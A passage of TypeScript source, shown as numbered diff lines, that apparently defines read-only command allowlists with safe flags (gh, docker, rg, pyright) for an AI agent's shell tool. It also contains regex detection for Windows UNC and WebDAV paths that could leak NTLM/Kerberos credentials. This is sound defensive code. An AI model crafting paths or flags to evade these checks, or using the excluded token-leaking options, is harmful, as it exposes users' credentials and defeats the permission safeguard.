// NOTE: gh repo view uses a positional argument, not --repo/-R flags
|
|
1071
|
+
'gh repo view': {
|
|
1072
|
+
safeFlags: {
|
|
1073
|
+
'--json': 'string',
|
|
1074
|
+
},
|
|
1075
|
+
additionalCommandIsDangerousCallback: ghIsDangerousCallback,
|
|
1076
|
+
},
|
|
1077
|
+
// gh run list is read-only — lists workflow runs
|
|
1078
|
+
'gh run list': {
|
|
1079
|
+
safeFlags: {
|
|
1080
|
+
'--branch': 'string', // Filter by branch
|
|
1081
|
+
'-b': 'string',
|
|
1082
|
+
'--status': 'string', // Filter by status
|
|
1083
|
+
'-s': 'string',
|
|
1084
|
+
'--workflow': 'string', // Filter by workflow
|
|
1085
|
+
'-w': 'string', // NOTE: -w is --workflow here, NOT --web (gh run list has no --web)
|
|
1086
|
+
'--limit': 'number', // Max results
|
|
1087
|
+
'-L': 'number',
|
|
1088
|
+
'--json': 'string', // JSON field selection
|
|
1089
|
+
'--repo': 'string', // Target repository
|
|
1090
|
+
'-R': 'string',
|
|
1091
|
+
'--event': 'string', // Filter by event type
|
|
1092
|
+
'-e': 'string',
|
|
1093
|
+
'--user': 'string', // Filter by user
|
|
1094
|
+
'-u': 'string',
|
|
1095
|
+
'--created': 'string', // Filter by creation date
|
|
1096
|
+
'--commit': 'string', // Filter by commit SHA
|
|
1097
|
+
'-c': 'string',
|
|
1098
|
+
},
|
|
1099
|
+
additionalCommandIsDangerousCallback: ghIsDangerousCallback,
|
|
1100
|
+
},
|
|
1101
|
+
// gh run view is read-only — displays a workflow run's details
|
|
1102
|
+
'gh run view': {
|
|
1103
|
+
safeFlags: {
|
|
1104
|
+
'--log': 'none', // Show full run log
|
|
1105
|
+
'--log-failed': 'none', // Show log for failed steps only
|
|
1106
|
+
'--exit-status': 'none', // Exit with run's status code
|
|
1107
|
+
'--verbose': 'none', // Show job steps
|
|
1108
|
+
'-v': 'none', // NOTE: -v is --verbose here, NOT --web
|
|
1109
|
+
'--json': 'string', // JSON field selection
|
|
1110
|
+
'--repo': 'string', // Target repository
|
|
1111
|
+
'-R': 'string',
|
|
1112
|
+
'--job': 'string', // View a specific job by ID
|
|
1113
|
+
'-j': 'string',
|
|
1114
|
+
'--attempt': 'number', // View a specific attempt
|
|
1115
|
+
'-a': 'number',
|
|
1116
|
+
},
|
|
1117
|
+
additionalCommandIsDangerousCallback: ghIsDangerousCallback,
|
|
1118
|
+
},
|
|
1119
|
+
// gh auth status is read-only — displays authentication state
|
|
1120
|
+
// NOTE: --show-token/-t intentionally excluded (leaks secrets)
|
|
1121
|
+
'gh auth status': {
|
|
1122
|
+
safeFlags: {
|
|
1123
|
+
'--active': 'none', // Display active account only
|
|
1124
|
+
'-a': 'none',
|
|
1125
|
+
'--hostname': 'string', // Check specific hostname
|
|
1126
|
+
'-h': 'string',
|
|
1127
|
+
'--json': 'string', // JSON field selection
|
|
1128
|
+
},
|
|
1129
|
+
additionalCommandIsDangerousCallback: ghIsDangerousCallback,
|
|
1130
|
+
},
|
|
1131
|
+
// gh pr status is read-only — shows your PRs
|
|
1132
|
+
'gh pr status': {
|
|
1133
|
+
safeFlags: {
|
|
1134
|
+
'--conflict-status': 'none', // Display merge conflict status
|
|
1135
|
+
'-c': 'none',
|
|
1136
|
+
'--json': 'string', // JSON field selection
|
|
1137
|
+
'--repo': 'string', // Target repository
|
|
1138
|
+
'-R': 'string',
|
|
1139
|
+
},
|
|
1140
|
+
additionalCommandIsDangerousCallback: ghIsDangerousCallback,
|
|
1141
|
+
},
|
|
1142
|
+
// gh issue status is read-only — shows your issues
|
|
1143
|
+
'gh issue status': {
|
|
1144
|
+
safeFlags: {
|
|
1145
|
+
'--json': 'string', // JSON field selection
|
|
1146
|
+
'--repo': 'string', // Target repository
|
|
1147
|
+
'-R': 'string',
|
|
1148
|
+
},
|
|
1149
|
+
additionalCommandIsDangerousCallback: ghIsDangerousCallback,
|
|
1150
|
+
},
|
|
1151
|
+
// gh release list is read-only — lists releases
|
|
1152
|
+
'gh release list': {
|
|
1153
|
+
safeFlags: {
|
|
1154
|
+
'--exclude-drafts': 'none', // Exclude draft releases
|
|
1155
|
+
'--exclude-pre-releases': 'none', // Exclude pre-releases
|
|
1156
|
+
'--json': 'string', // JSON field selection
|
|
1157
|
+
'--limit': 'number', // Max results
|
|
1158
|
+
'-L': 'number',
|
|
1159
|
+
'--order': 'string', // Order: asc|desc
|
|
1160
|
+
'-O': 'string',
|
|
1161
|
+
'--repo': 'string', // Target repository
|
|
1162
|
+
'-R': 'string',
|
|
1163
|
+
},
|
|
1164
|
+
additionalCommandIsDangerousCallback: ghIsDangerousCallback,
|
|
1165
|
+
},
|
|
1166
|
+
// gh release view is read-only — displays release details
|
|
1167
|
+
// NOTE: --web/-w intentionally excluded (opens browser)
|
|
1168
|
+
'gh release view': {
|
|
1169
|
+
safeFlags: {
|
|
1170
|
+
'--json': 'string', // JSON field selection
|
|
1171
|
+
'--repo': 'string', // Target repository
|
|
1172
|
+
'-R': 'string',
|
|
1173
|
+
},
|
|
1174
|
+
additionalCommandIsDangerousCallback: ghIsDangerousCallback,
|
|
1175
|
+
},
|
|
1176
|
+
// gh workflow list is read-only — lists workflow files
|
|
1177
|
+
'gh workflow list': {
|
|
1178
|
+
safeFlags: {
|
|
1179
|
+
'--all': 'none', // Include disabled workflows
|
|
1180
|
+
'-a': 'none',
|
|
1181
|
+
'--json': 'string', // JSON field selection
|
|
1182
|
+
'--limit': 'number', // Max results
|
|
1183
|
+
'-L': 'number',
|
|
1184
|
+
'--repo': 'string', // Target repository
|
|
1185
|
+
'-R': 'string',
|
|
1186
|
+
},
|
|
1187
|
+
additionalCommandIsDangerousCallback: ghIsDangerousCallback,
|
|
1188
|
+
},
|
|
1189
|
+
// gh workflow view is read-only — displays workflow summary
|
|
1190
|
+
// NOTE: --web/-w intentionally excluded (opens browser)
|
|
1191
|
+
'gh workflow view': {
|
|
1192
|
+
safeFlags: {
|
|
1193
|
+
'--ref': 'string', // Branch/tag with workflow version
|
|
1194
|
+
'-r': 'string',
|
|
1195
|
+
'--yaml': 'none', // View workflow yaml
|
|
1196
|
+
'-y': 'none',
|
|
1197
|
+
'--repo': 'string', // Target repository
|
|
1198
|
+
'-R': 'string',
|
|
1199
|
+
},
|
|
1200
|
+
additionalCommandIsDangerousCallback: ghIsDangerousCallback,
|
|
1201
|
+
},
|
|
1202
|
+
// gh label list is read-only — lists labels
|
|
1203
|
+
// NOTE: --web/-w intentionally excluded (opens browser)
|
|
1204
|
+
'gh label list': {
|
|
1205
|
+
safeFlags: {
|
|
1206
|
+
'--json': 'string', // JSON field selection
|
|
1207
|
+
'--limit': 'number', // Max results
|
|
1208
|
+
'-L': 'number',
|
|
1209
|
+
'--order': 'string', // Order: asc|desc
|
|
1210
|
+
'--search': 'string', // Search label names
|
|
1211
|
+
'-S': 'string',
|
|
1212
|
+
'--sort': 'string', // Sort: created|name
|
|
1213
|
+
'--repo': 'string', // Target repository
|
|
1214
|
+
'-R': 'string',
|
|
1215
|
+
},
|
|
1216
|
+
additionalCommandIsDangerousCallback: ghIsDangerousCallback,
|
|
1217
|
+
},
|
|
1218
|
+
// gh search repos is read-only — searches repositories
|
|
1219
|
+
// NOTE: --web/-w intentionally excluded (opens browser)
|
|
1220
|
+
'gh search repos': {
|
|
1221
|
+
safeFlags: {
|
|
1222
|
+
'--archived': 'none', // Filter by archived state
|
|
1223
|
+
'--created': 'string', // Filter by creation date
|
|
1224
|
+
'--followers': 'string', // Filter by followers count
|
|
1225
|
+
'--forks': 'string', // Filter by forks count
|
|
1226
|
+
'--good-first-issues': 'string', // Filter by good first issues
|
|
1227
|
+
'--help-wanted-issues': 'string', // Filter by help wanted issues
|
|
1228
|
+
'--include-forks': 'string', // Include forks: false|true|only
|
|
1229
|
+
'--json': 'string', // JSON field selection
|
|
1230
|
+
'--language': 'string', // Filter by language
|
|
1231
|
+
'--license': 'string', // Filter by license
|
|
1232
|
+
'--limit': 'number', // Max results
|
|
1233
|
+
'-L': 'number',
|
|
1234
|
+
'--match': 'string', // Restrict to field: name|description|readme
|
|
1235
|
+
'--number-topics': 'string', // Filter by number of topics
|
|
1236
|
+
'--order': 'string', // Order: asc|desc
|
|
1237
|
+
'--owner': 'string', // Filter by owner
|
|
1238
|
+
'--size': 'string', // Filter by size range
|
|
1239
|
+
'--sort': 'string', // Sort: forks|help-wanted-issues|stars|updated
|
|
1240
|
+
'--stars': 'string', // Filter by stars
|
|
1241
|
+
'--topic': 'string', // Filter by topic
|
|
1242
|
+
'--updated': 'string', // Filter by update date
|
|
1243
|
+
'--visibility': 'string', // Filter: public|private|internal
|
|
1244
|
+
},
|
|
1245
|
+
},
|
|
1246
|
+
// gh search issues is read-only — searches issues
|
|
1247
|
+
// NOTE: --web/-w intentionally excluded (opens browser)
|
|
1248
|
+
'gh search issues': {
|
|
1249
|
+
safeFlags: {
|
|
1250
|
+
'--app': 'string', // Filter by GitHub App author
|
|
1251
|
+
'--assignee': 'string', // Filter by assignee
|
|
1252
|
+
'--author': 'string', // Filter by author
|
|
1253
|
+
'--closed': 'string', // Filter by closed date
|
|
1254
|
+
'--commenter': 'string', // Filter by commenter
|
|
1255
|
+
'--comments': 'string', // Filter by comment count
|
|
1256
|
+
'--created': 'string', // Filter by creation date
|
|
1257
|
+
'--include-prs': 'none', // Include PRs in results
|
|
1258
|
+
'--interactions': 'string', // Filter by interactions count
|
|
1259
|
+
'--involves': 'string', // Filter by involvement
|
|
1260
|
+
'--json': 'string', // JSON field selection
|
|
1261
|
+
'--label': 'string', // Filter by label
|
|
1262
|
+
'--language': 'string', // Filter by language
|
|
1263
|
+
'--limit': 'number', // Max results
|
|
1264
|
+
'-L': 'number',
|
|
1265
|
+
'--locked': 'none', // Filter locked conversations
|
|
1266
|
+
'--match': 'string', // Restrict to field: title|body|comments
|
|
1267
|
+
'--mentions': 'string', // Filter by user mentions
|
|
1268
|
+
'--milestone': 'string', // Filter by milestone
|
|
1269
|
+
'--no-assignee': 'none', // Filter missing assignee
|
|
1270
|
+
'--no-label': 'none', // Filter missing label
|
|
1271
|
+
'--no-milestone': 'none', // Filter missing milestone
|
|
1272
|
+
'--no-project': 'none', // Filter missing project
|
|
1273
|
+
'--order': 'string', // Order: asc|desc
|
|
1274
|
+
'--owner': 'string', // Filter by owner
|
|
1275
|
+
'--project': 'string', // Filter by project
|
|
1276
|
+
'--reactions': 'string', // Filter by reaction count
|
|
1277
|
+
'--repo': 'string', // Filter by repository
|
|
1278
|
+
'-R': 'string',
|
|
1279
|
+
'--sort': 'string', // Sort field
|
|
1280
|
+
'--state': 'string', // Filter: open|closed
|
|
1281
|
+
'--team-mentions': 'string', // Filter by team mentions
|
|
1282
|
+
'--updated': 'string', // Filter by update date
|
|
1283
|
+
'--visibility': 'string', // Filter: public|private|internal
|
|
1284
|
+
},
|
|
1285
|
+
},
|
|
1286
|
+
// gh search prs is read-only — searches pull requests
|
|
1287
|
+
// NOTE: --web/-w intentionally excluded (opens browser)
|
|
1288
|
+
'gh search prs': {
|
|
1289
|
+
safeFlags: {
|
|
1290
|
+
'--app': 'string', // Filter by GitHub App author
|
|
1291
|
+
'--assignee': 'string', // Filter by assignee
|
|
1292
|
+
'--author': 'string', // Filter by author
|
|
1293
|
+
'--base': 'string', // Filter by base branch
|
|
1294
|
+
'-B': 'string',
|
|
1295
|
+
'--checks': 'string', // Filter by check status
|
|
1296
|
+
'--closed': 'string', // Filter by closed date
|
|
1297
|
+
'--commenter': 'string', // Filter by commenter
|
|
1298
|
+
'--comments': 'string', // Filter by comment count
|
|
1299
|
+
'--created': 'string', // Filter by creation date
|
|
1300
|
+
'--draft': 'none', // Filter draft PRs
|
|
1301
|
+
'--head': 'string', // Filter by head branch
|
|
1302
|
+
'-H': 'string',
|
|
1303
|
+
'--interactions': 'string', // Filter by interactions count
|
|
1304
|
+
'--involves': 'string', // Filter by involvement
|
|
1305
|
+
'--json': 'string', // JSON field selection
|
|
1306
|
+
'--label': 'string', // Filter by label
|
|
1307
|
+
'--language': 'string', // Filter by language
|
|
1308
|
+
'--limit': 'number', // Max results
|
|
1309
|
+
'-L': 'number',
|
|
1310
|
+
'--locked': 'none', // Filter locked conversations
|
|
1311
|
+
'--match': 'string', // Restrict to field: title|body|comments
|
|
1312
|
+
'--mentions': 'string', // Filter by user mentions
|
|
1313
|
+
'--merged': 'none', // Filter merged PRs
|
|
1314
|
+
'--merged-at': 'string', // Filter by merge date
|
|
1315
|
+
'--milestone': 'string', // Filter by milestone
|
|
1316
|
+
'--no-assignee': 'none', // Filter missing assignee
|
|
1317
|
+
'--no-label': 'none', // Filter missing label
|
|
1318
|
+
'--no-milestone': 'none', // Filter missing milestone
|
|
1319
|
+
'--no-project': 'none', // Filter missing project
|
|
1320
|
+
'--order': 'string', // Order: asc|desc
|
|
1321
|
+
'--owner': 'string', // Filter by owner
|
|
1322
|
+
'--project': 'string', // Filter by project
|
|
1323
|
+
'--reactions': 'string', // Filter by reaction count
|
|
1324
|
+
'--repo': 'string', // Filter by repository
|
|
1325
|
+
'-R': 'string',
|
|
1326
|
+
'--review': 'string', // Filter by review status
|
|
1327
|
+
'--review-requested': 'string', // Filter by review requested
|
|
1328
|
+
'--reviewed-by': 'string', // Filter by reviewer
|
|
1329
|
+
'--sort': 'string', // Sort field
|
|
1330
|
+
'--state': 'string', // Filter: open|closed
|
|
1331
|
+
'--team-mentions': 'string', // Filter by team mentions
|
|
1332
|
+
'--updated': 'string', // Filter by update date
|
|
1333
|
+
'--visibility': 'string', // Filter: public|private|internal
|
|
1334
|
+
},
|
|
1335
|
+
},
|
|
1336
|
+
// gh search commits is read-only — searches commits
|
|
1337
|
+
// NOTE: --web/-w intentionally excluded (opens browser)
|
|
1338
|
+
'gh search commits': {
|
|
1339
|
+
safeFlags: {
|
|
1340
|
+
'--author': 'string', // Filter by author
|
|
1341
|
+
'--author-date': 'string', // Filter by authored date
|
|
1342
|
+
'--author-email': 'string', // Filter by author email
|
|
1343
|
+
'--author-name': 'string', // Filter by author name
|
|
1344
|
+
'--committer': 'string', // Filter by committer
|
|
1345
|
+
'--committer-date': 'string', // Filter by committed date
|
|
1346
|
+
'--committer-email': 'string', // Filter by committer email
|
|
1347
|
+
'--committer-name': 'string', // Filter by committer name
|
|
1348
|
+
'--hash': 'string', // Filter by commit hash
|
|
1349
|
+
'--json': 'string', // JSON field selection
|
|
1350
|
+
'--limit': 'number', // Max results
|
|
1351
|
+
'-L': 'number',
|
|
1352
|
+
'--merge': 'none', // Filter merge commits
|
|
1353
|
+
'--order': 'string', // Order: asc|desc
|
|
1354
|
+
'--owner': 'string', // Filter by owner
|
|
1355
|
+
'--parent': 'string', // Filter by parent hash
|
|
1356
|
+
'--repo': 'string', // Filter by repository
|
|
1357
|
+
'-R': 'string',
|
|
1358
|
+
'--sort': 'string', // Sort: author-date|committer-date
|
|
1359
|
+
'--tree': 'string', // Filter by tree hash
|
|
1360
|
+
'--visibility': 'string', // Filter: public|private|internal
|
|
1361
|
+
},
|
|
1362
|
+
},
|
|
1363
|
+
// gh search code is read-only — searches code
|
|
1364
|
+
// NOTE: --web/-w intentionally excluded (opens browser)
|
|
1365
|
+
'gh search code': {
|
|
1366
|
+
safeFlags: {
|
|
1367
|
+
'--extension': 'string', // Filter by file extension
|
|
1368
|
+
'--filename': 'string', // Filter by filename
|
|
1369
|
+
'--json': 'string', // JSON field selection
|
|
1370
|
+
'--language': 'string', // Filter by language
|
|
1371
|
+
'--limit': 'number', // Max results
|
|
1372
|
+
'-L': 'number',
|
|
1373
|
+
'--match': 'string', // Restrict to: file|path
|
|
1374
|
+
'--owner': 'string', // Filter by owner
|
|
1375
|
+
'--repo': 'string', // Filter by repository
|
|
1376
|
+
'-R': 'string',
|
|
1377
|
+
'--size': 'string', // Filter by size range
|
|
1378
|
+
},
|
|
1379
|
+
},
|
|
1380
|
+
}
|
|
1381
|
+
|
|
1382
|
+
// ---------------------------------------------------------------------------
|
|
1383
|
+
// DOCKER_READ_ONLY_COMMANDS — docker inspect/logs read-only commands
|
|
1384
|
+
// ---------------------------------------------------------------------------
|
|
1385
|
+
|
|
1386
|
+
export const DOCKER_READ_ONLY_COMMANDS: Record<string, ExternalCommandConfig> =
|
|
1387
|
+
{
|
|
1388
|
+
'docker logs': {
|
|
1389
|
+
safeFlags: {
|
|
1390
|
+
'--follow': 'none',
|
|
1391
|
+
'-f': 'none',
|
|
1392
|
+
'--tail': 'string',
|
|
1393
|
+
'-n': 'string',
|
|
1394
|
+
'--timestamps': 'none',
|
|
1395
|
+
'-t': 'none',
|
|
1396
|
+
'--since': 'string',
|
|
1397
|
+
'--until': 'string',
|
|
1398
|
+
'--details': 'none',
|
|
1399
|
+
},
|
|
1400
|
+
},
|
|
1401
|
+
'docker inspect': {
|
|
1402
|
+
safeFlags: {
|
|
1403
|
+
'--format': 'string',
|
|
1404
|
+
'-f': 'string',
|
|
1405
|
+
'--type': 'string',
|
|
1406
|
+
'--size': 'none',
|
|
1407
|
+
'-s': 'none',
|
|
1408
|
+
},
|
|
1409
|
+
},
|
|
1410
|
+
}
|
|
1411
|
+
|
|
1412
|
+
// ---------------------------------------------------------------------------
|
|
1413
|
+
// RIPGREP_READ_ONLY_COMMANDS — rg (ripgrep) read-only search
|
|
1414
|
+
// ---------------------------------------------------------------------------
|
|
1415
|
+
|
|
1416
|
+
export const RIPGREP_READ_ONLY_COMMANDS: Record<string, ExternalCommandConfig> =
|
|
1417
|
+
{
|
|
1418
|
+
rg: {
|
|
1419
|
+
safeFlags: {
|
|
1420
|
+
// Pattern flags
|
|
1421
|
+
'-e': 'string', // Pattern to search for
|
|
1422
|
+
'--regexp': 'string',
|
|
1423
|
+
'-f': 'string', // Read patterns from file
|
|
1424
|
+
|
|
1425
|
+
// Common search options
|
|
1426
|
+
'-i': 'none', // Case insensitive
|
|
1427
|
+
'--ignore-case': 'none',
|
|
1428
|
+
'-S': 'none', // Smart case
|
|
1429
|
+
'--smart-case': 'none',
|
|
1430
|
+
'-F': 'none', // Fixed strings
|
|
1431
|
+
'--fixed-strings': 'none',
|
|
1432
|
+
'-w': 'none', // Word regexp
|
|
1433
|
+
'--word-regexp': 'none',
|
|
1434
|
+
'-v': 'none', // Invert match
|
|
1435
|
+
'--invert-match': 'none',
|
|
1436
|
+
|
|
1437
|
+
// Output options
|
|
1438
|
+
'-c': 'none', // Count matches
|
|
1439
|
+
'--count': 'none',
|
|
1440
|
+
'-l': 'none', // Files with matches
|
|
1441
|
+
'--files-with-matches': 'none',
|
|
1442
|
+
'--files-without-match': 'none',
|
|
1443
|
+
'-n': 'none', // Line number
|
|
1444
|
+
'--line-number': 'none',
|
|
1445
|
+
'-o': 'none', // Only matching
|
|
1446
|
+
'--only-matching': 'none',
|
|
1447
|
+
'-A': 'number', // After context
|
|
1448
|
+
'--after-context': 'number',
|
|
1449
|
+
'-B': 'number', // Before context
|
|
1450
|
+
'--before-context': 'number',
|
|
1451
|
+
'-C': 'number', // Context
|
|
1452
|
+
'--context': 'number',
|
|
1453
|
+
'-H': 'none', // With filename
|
|
1454
|
+
'-h': 'none', // No filename
|
|
1455
|
+
'--heading': 'none',
|
|
1456
|
+
'--no-heading': 'none',
|
|
1457
|
+
'-q': 'none', // Quiet
|
|
1458
|
+
'--quiet': 'none',
|
|
1459
|
+
'--column': 'none',
|
|
1460
|
+
|
|
1461
|
+
// File filtering
|
|
1462
|
+
'-g': 'string', // Glob
|
|
1463
|
+
'--glob': 'string',
|
|
1464
|
+
'-t': 'string', // Type
|
|
1465
|
+
'--type': 'string',
|
|
1466
|
+
'-T': 'string', // Type not
|
|
1467
|
+
'--type-not': 'string',
|
|
1468
|
+
'--type-list': 'none',
|
|
1469
|
+
'--hidden': 'none',
|
|
1470
|
+
'--no-ignore': 'none',
|
|
1471
|
+
'-u': 'none', // Unrestricted
|
|
1472
|
+
|
|
1473
|
+
// Common options
|
|
1474
|
+
'-m': 'number', // Max count per file
|
|
1475
|
+
'--max-count': 'number',
|
|
1476
|
+
'-d': 'number', // Max depth
|
|
1477
|
+
'--max-depth': 'number',
|
|
1478
|
+
'-a': 'none', // Text (search binary files)
|
|
1479
|
+
'--text': 'none',
|
|
1480
|
+
'-z': 'none', // Search zip
|
|
1481
|
+
'-L': 'none', // Follow symlinks
|
|
1482
|
+
'--follow': 'none',
|
|
1483
|
+
|
|
1484
|
+
// Display options
|
|
1485
|
+
'--color': 'string',
|
|
1486
|
+
'--json': 'none',
|
|
1487
|
+
'--stats': 'none',
|
|
1488
|
+
|
|
1489
|
+
// Help and version
|
|
1490
|
+
'--help': 'none',
|
|
1491
|
+
'--version': 'none',
|
|
1492
|
+
'--debug': 'none',
|
|
1493
|
+
|
|
1494
|
+
// Special argument separator
|
|
1495
|
+
'--': 'none',
|
|
1496
|
+
},
|
|
1497
|
+
},
|
|
1498
|
+
}
|
|
1499
|
+
|
|
1500
|
+
// ---------------------------------------------------------------------------
|
|
1501
|
+
// PYRIGHT_READ_ONLY_COMMANDS — pyright static type checker
|
|
1502
|
+
// ---------------------------------------------------------------------------
|
|
1503
|
+
|
|
1504
|
+
export const PYRIGHT_READ_ONLY_COMMANDS: Record<string, ExternalCommandConfig> =
|
|
1505
|
+
{
|
|
1506
|
+
pyright: {
|
|
1507
|
+
respectsDoubleDash: false, // pyright treats -- as a file path, not end-of-options
|
|
1508
|
+
safeFlags: {
|
|
1509
|
+
'--outputjson': 'none',
|
|
1510
|
+
'--project': 'string',
|
|
1511
|
+
'-p': 'string',
|
|
1512
|
+
'--pythonversion': 'string',
|
|
1513
|
+
'--pythonplatform': 'string',
|
|
1514
|
+
'--typeshedpath': 'string',
|
|
1515
|
+
'--venvpath': 'string',
|
|
1516
|
+
'--level': 'string',
|
|
1517
|
+
'--stats': 'none',
|
|
1518
|
+
'--verbose': 'none',
|
|
1519
|
+
'--version': 'none',
|
|
1520
|
+
'--dependencies': 'none',
|
|
1521
|
+
'--warnings': 'none',
|
|
1522
|
+
},
|
|
1523
|
+
additionalCommandIsDangerousCallback: (
|
|
1524
|
+
_rawCommand: string,
|
|
1525
|
+
args: string[],
|
|
1526
|
+
) => {
|
|
1527
|
+
// Check if --watch or -w appears as a standalone token (flag)
|
|
1528
|
+
return args.some(t => t === '--watch' || t === '-w')
|
|
1529
|
+
},
|
|
1530
|
+
},
|
|
1531
|
+
}
|
|
1532
|
+
|
|
1533
|
+
// ---------------------------------------------------------------------------
|
|
1534
|
+
// EXTERNAL_READONLY_COMMANDS — cross-shell read-only commands
|
|
1535
|
+
// Only commands that work identically in bash and PowerShell on Windows.
|
|
1536
|
+
// Unix-specific commands (cat, head, wc, etc.) belong in BashTool's READONLY_COMMANDS.
|
|
1537
|
+
// ---------------------------------------------------------------------------
|
|
1538
|
+
|
|
1539
|
+
export const EXTERNAL_READONLY_COMMANDS: readonly string[] = [
|
|
1540
|
+
// Cross-platform external tools that work the same in bash and PowerShell on Windows
|
|
1541
|
+
'docker ps',
|
|
1542
|
+
'docker images',
|
|
1543
|
+
] as const
|
|
1544
|
+
|
|
1545
|
+
// ---------------------------------------------------------------------------
|
|
1546
|
+
// UNC path detection (shared across Bash and PowerShell)
|
|
1547
|
+
// ---------------------------------------------------------------------------
|
|
1548
|
+
|
|
1549
|
+
/**
|
|
1550
|
+
* Check if a path or command contains a UNC path that could trigger network
|
|
1551
|
+
* requests (NTLM/Kerberos credential leakage, WebDAV attacks).
|
|
1552
|
+
*
|
|
1553
|
+
* This function detects:
|
|
1554
|
+
* - Basic UNC paths: \\server\share, \\foo.com\file
|
|
1555
|
+
* - WebDAV patterns: \\server@SSL@8443\, \\server@8443@SSL\, \\server\DavWWWRoot\
|
|
1556
|
+
* - IP-based UNC: \\192.168.1.1\share, \\[2001:db8::1]\share
|
|
1557
|
+
* - Forward-slash variants: //server/share
|
|
1558
|
+
*
|
|
1559
|
+
* @param pathOrCommand The path or command string to check
|
|
1560
|
+
* @returns true if the path/command contains potentially vulnerable UNC paths
|
|
1561
|
+
*/
|
|
1562
|
+
export function containsVulnerableUncPath(pathOrCommand: string): boolean {
|
|
1563
|
+
// Only check on Windows platform
|
|
1564
|
+
if (getPlatform() !== 'windows') {
|
|
1565
|
+
return false
|
|
1566
|
+
}
|
|
1567
|
+
|
|
1568
|
+
// 1. Check for general UNC paths with backslashes
|
|
1569
|
+
// Pattern matches: \\server, \\server\share, \\server/share, \\server@port\share
|
|
1570
|
+
// Uses [^\s\\/]+ for hostname to catch Unicode homoglyphs and other non-ASCII chars
|
|
1571
|
+
// Trailing accepts both \ and / since Windows treats both as path separators
|
|
1572
|
+
const backslashUncPattern = /\\\\[^\s\\/]+(?:@(?:\d+|ssl))?(?:[\\/]|$|\s)/i
|
|
1573
|
+
if (backslashUncPattern.test(pathOrCommand)) {
|
|
1574
|
+
return true
|
|
1575
|
+
}
|
|
1576
|
+
|
|
1577
|
+
// 2. Check for forward-slash UNC paths
|
|
1578
|
+
// Pattern matches: //server, //server/share, //server\share, //192.168.1.1/share
|
|
1579
|
+
// Uses negative lookbehind (?<!:) to exclude URLs (https://, http://, ftp://)
|
|
1580
|
+
// while catching // preceded by quotes, =, or any other non-colon character.
|
|
1581
|
+
// Trailing accepts both / and \ since Windows treats both as path separators
|
|
1582
|
+
const forwardSlashUncPattern =
|
|
1583
|
+
// eslint-disable-next-line custom-rules/no-lookbehind-regex -- .test() on short command strings
|
|
1584
|
+
/(?<!:)\/\/[^\s\\/]+(?:@(?:\d+|ssl))?(?:[\\/]|$|\s)/i
|
|
1585
|
+
if (forwardSlashUncPattern.test(pathOrCommand)) {
|
|
1586
|
+
return true
|
|
1587
|
+
}
|
|
1588
|
+
|
|
1589
|
+
// 3. Check for mixed-separator UNC paths (forward slash + backslashes)
|
|
1590
|
+
// On Windows/Cygwin, /\ is equivalent to // since both are path separators.
|
|
1591
|
+
// In bash, /\\server becomes /\server after escape processing, which is a UNC path.
|
|
1592
|
+
// Requires 2+ backslashes after / because a single backslash just escapes the next char
|
|
1593
|
+
// (e.g., /\a → /a after bash processing, which is NOT a UNC path).
|
|
1594
|
+
const mixedSlashUncPattern = /\/\\{2,}[^\s\\/]/
|
|
1595
|
+
if (mixedSlashUncPattern.test(pathOrCommand)) {
|
|
1596
|
+
return true
|
|
1597
|
+
}
|
|
1598
|
+
|
|
1599
|
+
// 4. Check for mixed-separator UNC paths (backslashes + forward slash)
|
|
1600
|
+
// \\/server in bash becomes \/server after escape processing, which is a UNC path
|
|
1601
|
+
// on Windows since both \ and / are path separators.
|
|
1602
|
+
const reverseMixedSlashUncPattern = /\\{2,}\/[^\s\\/]/
|
|
1603
|
+
if (reverseMixedSlashUncPattern.test(pathOrCommand)) {
|
|
1604
|
+
return true
|
|
1605
|
+
}
|
|
1606
|
+
|
|
1607
|
+
// 5. Check for WebDAV SSL/port patterns
|
|
1608
|
+
// Examples: \\server@SSL@8443\path, \\server@8443@SSL\path
|
|
1609
|
+
if (/@SSL@\d+/i.test(pathOrCommand) || /@\d+@SSL/i.test(pathOrCommand)) {
|
|
1610
|
+
return true
|
|
1611
|
+
}
|
|
1612
|
+
|
|
1613
|
+
// 6. Check for DavWWWRoot marker (Windows WebDAV redirector)
|
|
1614
|
+
// Example: \\server\DavWWWRoot\path
|
|
1615
|
+
if (/DavWWWRoot/i.test(pathOrCommand)) {
|
|
1616
|
+
return true
|
|
1617
|
+
}
|
|
1618
|
+
|
|
1619
|
+
// 7. Check for UNC paths with IPv4 addresses (explicit check for defense-in-depth)
|
|
1620
|
+
// Examples: \\192.168.1.1\share, \\10.0.0.1\path
|
|
1621
|
+
if (
|
|
1622
|
+
/^\\\\(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[\\/]/.test(pathOrCommand) ||
|
|
1623
|
+
/^\/\/(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[\\/]/.test(pathOrCommand)
|
|
1624
|
+
) {
|
|
1625
|
+
return true
|
|
1626
|
+
}
|
|
1627
|
+
|
|
1628
|
+
// 8. Check for UNC paths with bracketed IPv6 addresses (explicit check for defense-in-depth)
|
|
1629
|
+
// Examples: \\[2001:db8::1]\share, \\[::1]\path
|
|
1630
|
+
if (
|
|
1631
|
+
/^\\\\(\[[\da-fA-F:]+\])[\\/]/.test(pathOrCommand) ||
|
|
1632
|
+
/^\/\/(\[[\da-fA-F:]+\])[\\/]/.test(pathOrCommand)
|
|
1633
|
+
) {
|
|
1634
|
+
return true
|
|
1635
|
+
}
|
|
1636
|
+
|
|
1637
|
+
return false
|
|
1638
|
+
}
|
|
1639
|
+
|
|
1640
|
+
// ---------------------------------------------------------------------------
|
|
1641
|
+
// Flag validation utilities
|
|
1642
|
+
// ---------------------------------------------------------------------------
|
|
1643
|
+
|
|
1644
|
+
// Regex pattern to match valid flag names (letters, digits, underscores, hyphens)
|
|
1645
|
+
export const FLAG_PATTERN = /^-[a-zA-Z0-9_-]/
|
|
1646
|
+
|
|
1647
|
+
/**
|
|
1648
|
+
* Validates flag arguments based on their expected type
|
|
1649
|
+
*/
|
|
1650
|
+
export function validateFlagArgument(
|
|
1651
|
+
value: string,
|
|
1652
|
+
argType: FlagArgType,
|
|
1653
|
+
): boolean {
|
|
1654
|
+
switch (argType) {
|
|
1655
|
+
case 'none':
|
|
1656
|
+
return false // Should not have been called for 'none' type
|
|
1657
|
+
case 'number':
|
|
1658
|
+
return /^\d+$/.test(value)
|
|
1659
|
+
case 'string':
|
|
1660
|
+
return true // Any string including empty is valid
|
|
1661
|
+
case 'char':
|
|
1662
|
+
return value.length === 1
|
|
1663
|
+
case '{}':
|
|
1664
|
+
return value === '{}'
|
|
1665
|
+
case 'EOF':
|
|
1666
|
+
